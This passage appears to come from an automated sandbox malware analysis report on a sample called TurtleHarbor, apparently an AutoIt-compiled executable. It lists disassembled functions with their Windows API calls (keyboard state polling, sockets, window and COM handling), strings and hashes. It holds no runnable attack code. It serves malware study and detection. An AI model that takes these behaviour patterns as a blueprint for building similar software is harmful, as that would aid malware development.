_wcscpy.LIBCMT ref: 00374CB9
WSACleanup.WSOCK32 ref: 00374CC7
_wcscpy.LIBCMT ref: 00374CD5

Strings

0.0.0.0, xrefs: 00374C70

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 13c03667e7ace8eaece119828c6527f3fcfdac18d21fa44c63c67a9a7aed789d
Instruction ID: a04ad6a392605b2c842df3fa794b7a3ba37748faf04138d570d884f9301648e6
Opcode Fuzzy Hash: 13c03667e7ace8eaece119828c6527f3fcfdac18d21fa44c63c67a9a7aed789d
Instruction Fuzzy Hash: 14112C31505109BFCB2BA770DD8AEDB77BCDF41710F048165F04896091EF78A9818B51

Function 00375530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00375535

Part of subcall function 0033083E: timeGetTime.WINMM(?,00000002,0031C22C), ref: 00330842

Sleep.KERNEL32(0000000A), ref: 00375561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00375585
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003755A7
SetActiveWindow.USER32 ref: 003755C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003755D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 003755F3
Sleep.KERNEL32(000000FA), ref: 003755FE
IsWindow.USER32 ref: 0037560A
EndDialog.USER32(00000000), ref: 0037561B

Strings

BUTTON, xrefs: 00375599

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ac9b8ff4994e8183825109fc9d67e57bb90431acee7860e6bb679873e7cfa409
Instruction ID: f1f845f4aae5075c1a4fe05713cc3883a8836d47d07431f68bbe8c0d42a99d0a
Opcode Fuzzy Hash: ac9b8ff4994e8183825109fc9d67e57bb90431acee7860e6bb679873e7cfa409
Instruction Fuzzy Hash: B821D1B0205604AFE76B5B60FC89E253B6FEB47345F045419F00A811B1DFB99C54DB62

Function 0037DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

CoInitialize.OLE32(00000000), ref: 0037DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0037DCC0
SHGetDesktopFolder.SHELL32(?), ref: 0037DCD4
CoCreateInstance.OLE32(003A3D4C,00000000,00000001,003CB86C,?), ref: 0037DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0037DD8F
CoTaskMemFree.OLE32(?,?), ref: 0037DDE7
_memset.LIBCMT ref: 0037DE24
SHBrowseForFolderW.SHELL32(?), ref: 0037DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0037DE83
CoTaskMemFree.OLE32(00000000), ref: 0037DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0037DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 0037DEC3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: c8c12abdae8628639d4d34ad23b65c497463947f97a6de931371c5ea92e707b2
Instruction ID: 5f4a661ebc2034ab5489e2231004b1c134d4a38773a90e05dd7072b114798d9e
Opcode Fuzzy Hash: c8c12abdae8628639d4d34ad23b65c497463947f97a6de931371c5ea92e707b2
Instruction Fuzzy Hash: 5DB1F975A00109AFDB16DFA4C888DAEBBB9FF89304F158459F909EB251DB34EE41CB50

Function 0037081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00370896
SetKeyboardState.USER32(?), ref: 00370901
GetAsyncKeyState.USER32(000000A0), ref: 00370921
GetKeyState.USER32(000000A0), ref: 00370938
GetAsyncKeyState.USER32(000000A1), ref: 00370967
GetKeyState.USER32(000000A1), ref: 00370978
GetAsyncKeyState.USER32(00000011), ref: 003709A4
GetKeyState.USER32(00000011), ref: 003709B2
GetAsyncKeyState.USER32(00000012), ref: 003709DB
GetKeyState.USER32(00000012), ref: 003709E9
GetAsyncKeyState.USER32(0000005B), ref: 00370A12
GetKeyState.USER32(0000005B), ref: 00370A20

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: cc6c23d90620a6402860bd15ae5bea327facabca71e012be45e32a83b913380d
Instruction ID: 62a6d272d8ad6366772f712b28f96b5539e9b828494aabf4396b3a4f084693f1
Opcode Fuzzy Hash: cc6c23d90620a6402860bd15ae5bea327facabca71e012be45e32a83b913380d
Instruction Fuzzy Hash: D051DE3090478869FB3AD7B484547EABFB49F02380F09C59DD5C95B1C3DAAC9A4CCB92

Function 0036CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0036CE1C
GetWindowRect.USER32(00000000,?), ref: 0036CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0036CE8C
GetDlgItem.USER32(?,00000002), ref: 0036CE97
GetWindowRect.USER32(00000000,?), ref: 0036CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0036CEFD
GetDlgItem.USER32(?,000003E9), ref: 0036CF0B
GetWindowRect.USER32(00000000,?), ref: 0036CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0036CF5F
GetDlgItem.USER32(?,000003EA), ref: 0036CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0036CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 0036CF97

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 953353c1c1e4edd304f339b3db5f1656eddf8d915c0c095af75c2275e4ac42d0
Instruction ID: 754121fc2d54da44360d75dd2bdbd46a6a3017faf579e9865e3b8c7e0783ffad
Opcode Fuzzy Hash: 953353c1c1e4edd304f339b3db5f1656eddf8d915c0c095af75c2275e4ac42d0
Instruction Fuzzy Hash: 92518F71B10205AFDB19CFA8CD89ABEBBBAEB88311F14812DF516D7294D770AD008B50

Function 00312581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 003129AB: GetWindowLongW.USER32(?,000000EB), ref: 003129BC

GetSysColor.USER32(0000000F), ref: 003125AF

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 5ea5155ba7cc4c511fd03ef02c6cc5091dd599f1aa3d9b52ffdfddbe90211ad8
Instruction ID: acc7cb4f17494aef5d081d6e290870575b3de42398737f347cd7787792a78f62
Opcode Fuzzy Hash: 5ea5155ba7cc4c511fd03ef02c6cc5091dd599f1aa3d9b52ffdfddbe90211ad8
Instruction Fuzzy Hash: 6541C531104144AFDB2B5F28AC88BFA376AEB0E331F164261FD658E1E1D7B08C91DB25

Function 003229BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00330B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00322A3E,?,00008000), ref: 00330BA7

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00322ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00322C2C

Part of subcall function 00323EBE: _wcscpy.LIBCMT ref: 00323EF6

Part of subcall function 0033386D: _iswctype.LIBCMT ref: 00333875

Strings

AU3!, xrefs: 00322A93
Unterminated string, xrefs: 003600D6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0035FD17
Bad directive syntax error, xrefs: 0036008F
Error opening the file, xrefs: 0035FD33, 0035FDAA
EA06, xrefs: 0035FD48

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 3a41be106610896becc4e182c4602a6f82f25f1de979c9ef99d40083b7a8a0be
Instruction ID: 35fbcf9a633626fd32e5aa7e36345ba22c6b77bb740f129dc78e31d4e0574b17
Opcode Fuzzy Hash: 3a41be106610896becc4e182c4602a6f82f25f1de979c9ef99d40083b7a8a0be
Instruction Fuzzy Hash: DD02B2701083519FC726EF24D881EAFBBE5EF95314F10491DF8999B2A2DB30DA49CB42

Function 00314D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00314D62
__swprintf.LIBCMT ref: 00314DAC
__i64tow.LIBCMT ref: 0034DB3B

Strings

0x%p, xrefs: 0034DB1D
%.15g, xrefs: 00314DA6
False, xrefs: 0034DB03
True, xrefs: 0034DAFC

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 96c8f4db720d56b6ebfef9a889180070a8f4aa239c1b366e864414359d4897a6
Instruction ID: 2fb86e0b09a9efac95465e65f3f6ce58ea5215a99a2cf164aa9830f78327d500
Opcode Fuzzy Hash: 96c8f4db720d56b6ebfef9a889180070a8f4aa239c1b366e864414359d4897a6
Instruction Fuzzy Hash: B541BB715042059FDF3AEF74D982EBA73E8EF49300F24445EE549DF292EA71A941C711

Function 00397777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0039778F
CreateMenu.USER32 ref: 003977AA
SetMenu.USER32(?,00000000), ref: 003977B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397846
IsMenu.USER32(?), ref: 0039785C
CreatePopupMenu.USER32 ref: 00397866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00397893
DrawMenuBar.USER32 ref: 0039789B

Strings

0, xrefs: 00397785
F, xrefs: 00397887

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 725b7c5cde01e42607e77c727840800bde8676fca1189282ba7949fb08e61f4d
Instruction ID: 6bc9020a0a0d3eeaba13853d9d301692301bf7f25f1f8a1a7d7ecd9e54d6f1ab
Opcode Fuzzy Hash: 725b7c5cde01e42607e77c727840800bde8676fca1189282ba7949fb08e61f4d
Instruction Fuzzy Hash: C2417C74A14209EFDF16DF64D889AAA7BF9FF4A310F154429F905A73A0D730A910DF50

Function 00397AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00397B83
CreateCompatibleDC.GDI32(00000000), ref: 00397B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00397B9D
SelectObject.GDI32(00000000,00000000), ref: 00397BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00397BB0
DeleteDC.GDI32(00000000), ref: 00397BB9
GetWindowLongW.USER32(?,000000EC), ref: 00397BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00397BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00397BE3

Strings

static, xrefs: 00397B1B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3d8c85c1ddb9ebfae151e505a75b2c7e73f4d36e682838a7d61f8eca9ad7fa72
Instruction ID: 7e3f198318f680644f77dc8fecede711b9be08bdc2e710020c94c59c6713523a
Opcode Fuzzy Hash: 3d8c85c1ddb9ebfae151e505a75b2c7e73f4d36e682838a7d61f8eca9ad7fa72
Instruction Fuzzy Hash: 6E315632114219ABDF169FA4DC49FEB3B6DFF0A320F110215FA55A61A0C731E821DBA4

Function 00337030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033706B

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

__gmtime64_s.LIBCMT ref: 00337104
__gmtime64_s.LIBCMT ref: 0033713A
__gmtime64_s.LIBCMT ref: 00337157
__allrem.LIBCMT ref: 003371AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003371C9
__allrem.LIBCMT ref: 003371E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003371FE
__allrem.LIBCMT ref: 00337215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00337233
__invoke_watson.LIBCMT ref: 003372A4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: af9a0b020bc7c5cb100549819213dbb7a8d9100d0e694e8a29e902c756338f6d
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: BE71F6B2A04707ABD7269E79CCC1B5AB3E8AF11360F15463AF914EB681E770ED408790

Function 00372CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00372CE9
GetMenuItemInfoW.USER32(003D7890,000000FF,00000000,00000030), ref: 00372D4A
SetMenuItemInfoW.USER32(003D7890,00000004,00000000,00000030), ref: 00372D80
Sleep.KERNEL32(000001F4), ref: 00372D92
GetMenuItemCount.USER32(?), ref: 00372DD6
GetMenuItemID.USER32(?,00000000), ref: 00372DF2
GetMenuItemID.USER32(?,-00000001), ref: 00372E1C
GetMenuItemID.USER32(?,?), ref: 00372E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00372EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372EDC

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: d0fc7047cd73bbece87e6c4121bf899744ef9a6d7080e372f28407b8e5060bce
Instruction ID: 70f5d7b1a2258eeb601175fc3736c4260348a7f767560e3dda60022bd5e0822e
Opcode Fuzzy Hash: d0fc7047cd73bbece87e6c4121bf899744ef9a6d7080e372f28407b8e5060bce
Instruction Fuzzy Hash: C861BE70900249AFDB36CF64DC88ABFBBBCEB02304F158459F859A7651D739AD05DB20

Function 00397548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003975CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003975CD
GetWindowLongW.USER32(?,000000F0), ref: 003975F1
_memset.LIBCMT ref: 00397602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00397614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0039768C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 1c16e0b4fd086b457dd61c24b22c2f8b5849fccc87a357268bed24095f8804d9
Instruction ID: 2ee339f109ebdb3a135779d69c530a3ae6b587e34fbbfa084c1f0ee66344b672
Opcode Fuzzy Hash: 1c16e0b4fd086b457dd61c24b22c2f8b5849fccc87a357268bed24095f8804d9
Instruction Fuzzy Hash: F4616F75904208AFDB12DFA4DC85EEE77F8EB49710F100156FA15AB2E1D770AE41DB50

Function 003677B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003677DD
SafeArrayAllocData.OLEAUT32(?), ref: 00367836
VariantInit.OLEAUT32(?), ref: 00367848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00367868
VariantCopy.OLEAUT32(?,?), ref: 003678BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 003678CF
VariantClear.OLEAUT32(?), ref: 003678E4
SafeArrayDestroyData.OLEAUT32(?), ref: 003678F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003678FA
VariantClear.OLEAUT32(?), ref: 0036790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00367917

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 192f3306e4f12b0301b426469495c14c1350c1b62abc49acbd1d7bca0450cde1
Instruction ID: d5f6783ce0d530a945379bb40b71c4e584baafe6fe141e0bd6b9bc8c5a12144c
Opcode Fuzzy Hash: 192f3306e4f12b0301b426469495c14c1350c1b62abc49acbd1d7bca0450cde1
Instruction Fuzzy Hash: AE415135A042199FCB06DFA5D8489EDBBB9FF4D344F40C069E955AB261CB30AD45CF90

Function 00388AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

CoInitialize.OLE32 ref: 00388AED
CoUninitialize.OLE32 ref: 00388AF8
CoCreateInstance.OLE32(?,00000000,00000017,003A3BBC,?), ref: 00388B58
IIDFromString.OLE32(?,?), ref: 00388BCB
VariantInit.OLEAUT32(?), ref: 00388C65
VariantClear.OLEAUT32(?), ref: 00388CC6

Strings

NULL Pointer assignment, xrefs: 00388B9D
Failed to create object, xrefs: 00388B63, 00388C19
Invalid parameter, xrefs: 00388BE4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 073c120354c7ab8273e8183032baa3e7db1370a5482e6e648ffacd04508d32ab
Instruction ID: 3155ced8fecdd9f76cddd33b049412373328785c46ed1da9f1ae174c9ea084bb
